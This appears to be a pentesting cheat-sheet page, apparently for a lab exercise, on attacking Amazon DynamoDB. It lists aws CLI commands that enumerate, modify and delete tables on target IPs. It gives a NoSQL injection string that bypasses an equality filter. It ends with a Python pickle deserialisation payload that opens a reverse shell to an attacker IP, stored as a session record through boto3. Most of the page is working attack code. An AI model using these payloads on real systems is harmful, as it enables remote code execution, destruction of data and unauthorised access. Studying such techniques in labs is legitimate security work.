Skip to content

DynamoDB

Description

Amazon DynamoDB is a fully managed proprietary NoSQL database service that supports key–value and document data structures and is offered by Amazon.com as part of the Amazon Web Services portfolio. DynamoDB exposes a similar data model to and derives its name from Dynamo, but has a different underlying implementation.

Enumeration

aws --endpoint http://192.84.91.3:4567 dynamodb list-tables
aws --endpoint http://192.84.91.3:4567 dynamodb scan --table users
aws --endpoint http://192.84.91.3:4567 dynamodb describe-table --table products
aws --endpoint http://192.84.91.3:4567 dynamodb query --table products --key-condition-expression "ProductId = :value" --expression-attribute-values file://attribute_value.json
aws --endpoint http://192.84.91.3:4567 dynamodb put-item --table products --item file://item.json
aws --endpoint http://192.84.91.3:4567 dynamodb get-item --table products --key file://key.json
aws --endpoint http://192.84.91.3:4567 dynamodb update-item --table products --key file://key.json --update-expression "SET ProductDescription = :value" --expression-attribute-values file://attribute_value.json
aws --endpoint http://192.84.91.3:4567 dynamodb batch-write-item --request-items file://items.json
aws --endpoint http://192.243.181.3:4567 dynamodb delete-item --table orders --key file://key.json
aws --endpoint http://192.243.181.3:4567 dynamodb delete-table --table orders

NoSQL Injection Example

{"Name": {"ComparisonOperator": "EQ","AttributeValueList": [{"S": "alice""}]}}
json = '{"Name": {"ComparisonOperator": "EQ","AttributeValueList": [{"S": "' +user_input + '"}]}}'

alice"}],"ComparisonOperator": "GT","AttributeValueList": [{"S": "*

Insecure Deserialisation session (Pickle)

import pickle
import subprocess
import os
import boto3

class Shell(object):
  def __reduce__(self):
    return (os.system,("python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"1 92.114.103.2\",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'&",))

pickledData = pickle.dumps(Shell())
client = boto3.client("dynamodb",endpoint_url="http://dynamodb.pentesteracademylab.appspot.com:4567")

client.put_item(Item = {
  "sessionid": {"S": "1111111"},
  "sessionData":{"B": pickledData}
}, TableName = "session")

Resources